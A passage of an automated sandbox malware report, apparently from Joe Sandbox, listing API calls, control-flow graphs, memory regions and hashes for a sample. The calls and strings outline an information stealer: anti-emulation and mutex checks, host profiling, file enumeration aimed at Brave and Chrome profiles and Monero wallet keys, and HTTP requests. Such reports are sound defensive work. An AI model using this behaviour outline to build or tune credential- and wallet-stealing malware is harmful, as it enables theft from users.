                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: 21c823a443f5cc0c2a475f2c30acca4d4a856d5ee1646ffbd6094419b182b4db
                        • Instruction ID: 9a3e83f713c405af6157523b291fc27a3d995cba3b1f8f314a0290dfdebac88e
                        • Opcode Fuzzy Hash: 21c823a443f5cc0c2a475f2c30acca4d4a856d5ee1646ffbd6094419b182b4db
                        • Instruction Fuzzy Hash: 50014BF0984308BBEB10DBE4DC49B9EBBB8AB14701F248048E745B72C4D67896518B99

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1450 1016af3 1451 1016b0a 1450->1451 1453 1016aba-1016ad7 call 101aad0 OpenEventA 1451->1453 1454 1016b0c-1016b22 call 1016920 call 1015b10 CloseHandle ExitProcess 1451->1454 1459 1016af5-1016b04 CloseHandle Sleep 1453->1459 1460 1016ad9-1016af1 call 101aad0 CreateEventA 1453->1460 1459->1451 1460->1454
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01899218,?,0102110C,?,00000000,?,01021110,?,00000000,01020AEF), ref: 01016ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 01016AE8
                        • CloseHandle.KERNEL32(00000000), ref: 01016AF9
                        • Sleep.KERNEL32(00001770), ref: 01016B04
                        • CloseHandle.KERNEL32(?,00000000,?,01899218,?,0102110C,?,00000000,?,01021110,?,00000000,01020AEF), ref: 01016B1A
                        • ExitProcess.KERNEL32 ref: 01016B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: d8db6ff1035b0f77bc9c74c60be9b24512885abf25b4f01e53e3401b11e74822
                        • Instruction ID: ed734f82b2c0856c0a8f92b630e0d95057bf43e745306bd40c70f44c0ae050b6
                        • Opcode Fuzzy Hash: d8db6ff1035b0f77bc9c74c60be9b24512885abf25b4f01e53e3401b11e74822
                        • Instruction Fuzzy Hash: DAF03A35A8020AABE720ABA0AC59BBE7A74FB14741F404514B583A6188CBF95540CA55

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 01004839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 01004849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 7c88172baf7e6bbafeb57558f9964cb4952c6aa1ef48434ac650bfffc0da3adf
                        • Instruction ID: fe0d47b1557f004b7763b0b0b5a8c963a6d1a7e2fb6f33163b88a935fe41ce59
                        • Opcode Fuzzy Hash: 7c88172baf7e6bbafeb57558f9964cb4952c6aa1ef48434ac650bfffc0da3adf
                        • Instruction Fuzzy Hash: 75214FB1E41209ABDF14DFA4E849ADE7B74FB44320F108625F965A72C0EB706A05CF91

                        Control-flow Graph

                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 01006280: InternetOpenA.WININET(01020DFE,00000001,00000000,00000000,00000000), ref: 010062E1
                          • Part of subcall function 01006280: StrCmpCA.SHLWAPI(?,0189EAC8), ref: 01006303
                          • Part of subcall function 01006280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01006335
                          • Part of subcall function 01006280: HttpOpenRequestA.WININET(00000000,GET,?,0189E020,00000000,00000000,00400100,00000000), ref: 01006385
                          • Part of subcall function 01006280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 010063BF
                          • Part of subcall function 01006280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010063D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01015228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 84d659ccf11cc81e91665b45ee3653fb782ebe2a48ab03394a8831dc3a10e817
                        • Instruction ID: dba8a6414fe459658960aac8c7d083c4b8685f015493f14fb9aa4845b201f2e1
                        • Opcode Fuzzy Hash: 84d659ccf11cc81e91665b45ee3653fb782ebe2a48ab03394a8831dc3a10e817
                        • Instruction Fuzzy Hash: 96115E31A01089EBDB14FF74DD90AED7338AF60210F804158F88B4B594EF78AB0ACB90
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01017910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01017917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0101792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 43b2fc19d6f4f879c5b9401a6e5670f06f016c13127219255556d34217ce918f
                        • Instruction ID: 76799c8f47c6fc9dcdf894da853776df2d69752832cbf4562ace2758fe54fe12
                        • Opcode Fuzzy Hash: 43b2fc19d6f4f879c5b9401a6e5670f06f016c13127219255556d34217ce918f
                        • Instruction Fuzzy Hash: 3F01A9B1944204EFD710DF99D949BAEBBF8F704B11F10425AF546E3284C37855048BA1
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0100112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 01001132
                        • ExitProcess.KERNEL32 ref: 01001143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: 67505a5fda84d15429c014f2785630c48439c6f2e9dd10a70808eda29af1ce64
                        • Instruction ID: b14bc6418a705a58dce4af23809a07362c270a096ef0273ab066f58b4f480002
                        • Opcode Fuzzy Hash: 67505a5fda84d15429c014f2785630c48439c6f2e9dd10a70808eda29af1ce64
                        • Instruction Fuzzy Hash: F5E0E674A85308FBF765ABA4AC0EB4D76B8EF04B05F504054F70A771C4D6B566009799
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 010010B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 010010F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 98801fbb23e47293fd8b923853a34f13eb9b81907d87740e47513c3bad0870bf
                        • Instruction ID: 5c96b6e6e571e3fe4821ae4bab897c2962a37e5bbbfb881e9e6628720045d020
                        • Opcode Fuzzy Hash: 98801fbb23e47293fd8b923853a34f13eb9b81907d87740e47513c3bad0870bf
                        • Instruction Fuzzy Hash: C2F0E271681208BBF724DAA8AC49FAEB7E8E705B15F300448F685E7280D5719F00CBA0
                        APIs
                          • Part of subcall function 010178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 01017910
                          • Part of subcall function 010178E0: RtlAllocateHeap.NTDLL(00000000), ref: 01017917
                          • Part of subcall function 010178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0101792F
                          • Part of subcall function 01017850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,010011B7), ref: 01017880
                          • Part of subcall function 01017850: RtlAllocateHeap.NTDLL(00000000), ref: 01017887
                          • Part of subcall function 01017850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0101789F
                        • ExitProcess.KERNEL32 ref: 010011C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: caffcafe89c403ed20d3a5dc8f7bb6bb0a0ab7afa12dfffee24ca1d6aa240d23
                        • Instruction ID: 619defe7dd262cb30b550764b9518d2ab2a7f69d4d4f5212bbb4f0d7c03796fb
                        • Opcode Fuzzy Hash: caffcafe89c403ed20d3a5dc8f7bb6bb0a0ab7afa12dfffee24ca1d6aa240d23
                        • Instruction Fuzzy Hash: 53E012BADD030257EA2573B4BC09BAA329C6B14245F040424ED4AD314AFA29E50187E5
                        APIs
                        • wsprintfA.USER32 ref: 010138CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 010138E3
                        • lstrcat.KERNEL32(?,?), ref: 01013935
                        • StrCmpCA.SHLWAPI(?,01020F70), ref: 01013947
                        • StrCmpCA.SHLWAPI(?,01020F74), ref: 0101395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 01013C67
                        • FindClose.KERNEL32(000000FF), ref: 01013C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                         • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: c81ca4d36fe1cffbb6dc2b74866e0fb1a32a7692f0b1fc78fc6f180041b2b776
                        • Instruction ID: 7a8de3eebd6ab357f5e8a8275d9be078786f83730fbb613c01d512d0f467d42d
                        • Opcode Fuzzy Hash: c81ca4d36fe1cffbb6dc2b74866e0fb1a32a7692f0b1fc78fc6f180041b2b776
                        • Instruction Fuzzy Hash: 54A182B5A402199BDB34DFA4DC88FEE7378BB58300F044588E64E9B148EB759B84CF61
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • FindFirstFileA.KERNEL32(00000000,?,01020B32,01020B2B,00000000,?,?,?,010213F4,01020B2A), ref: 0100BEF5
                        • StrCmpCA.SHLWAPI(?,010213F8), ref: 0100BF4D
                        • StrCmpCA.SHLWAPI(?,010213FC), ref: 0100BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0100C7BF
                        • FindClose.KERNEL32(000000FF), ref: 0100C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                         • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 20563c154d2c125edc27823fb811226ab4b32f330038ab7f1bf0d85966ed07b4
                        • Instruction ID: e9a0dd610beb00ea14a235589729405ceb21805b4f84d13a48229a3f205e5fab
                        • Opcode Fuzzy Hash: 20563c154d2c125edc27823fb811226ab4b32f330038ab7f1bf0d85966ed07b4
                        • Instruction Fuzzy Hash: B842A372A00145EBDB15FB70DD95EED733DAB64300F404598E98B97084EF38AB4ACBA1
                        APIs
                        • wsprintfA.USER32 ref: 0101492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 01014943
                        • StrCmpCA.SHLWAPI(?,01020FDC), ref: 01014971
                        • StrCmpCA.SHLWAPI(?,01020FE0), ref: 01014987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 01014B7D
                        • FindClose.KERNEL32(000000FF), ref: 01014B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                         • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: f0ce6d5abd76b0e2daea5807673210387392281f0b05849f679a9cb0295bb276
                        • Instruction ID: 5c4ac8cf2fc4315c4d64e573b7ee7ee5edfbccd6cf1d43c5ce94541862781d5b
                        • Opcode Fuzzy Hash: f0ce6d5abd76b0e2daea5807673210387392281f0b05849f679a9cb0295bb276
                        • Instruction Fuzzy Hash: C86175B6940219ABDB34EBA0EC48EEA73BCFB58700F00458CF64A97048EB759745CF90
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 01014580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01014587
                        • wsprintfA.USER32 ref: 010145A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 010145BD
                        • StrCmpCA.SHLWAPI(?,01020FC4), ref: 010145EB
                        • StrCmpCA.SHLWAPI(?,01020FC8), ref: 01014601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0101468B
                        • FindClose.KERNEL32(000000FF), ref: 010146A0
                        • lstrcat.KERNEL32(?,0189E968), ref: 010146C5
                        • lstrcat.KERNEL32(?,0189DBE0), ref: 010146D8
                        • lstrlen.KERNEL32(?), ref: 010146E5
                        • lstrlen.KERNEL32(?), ref: 010146F6
                        Strings
                        Memory Dump Source
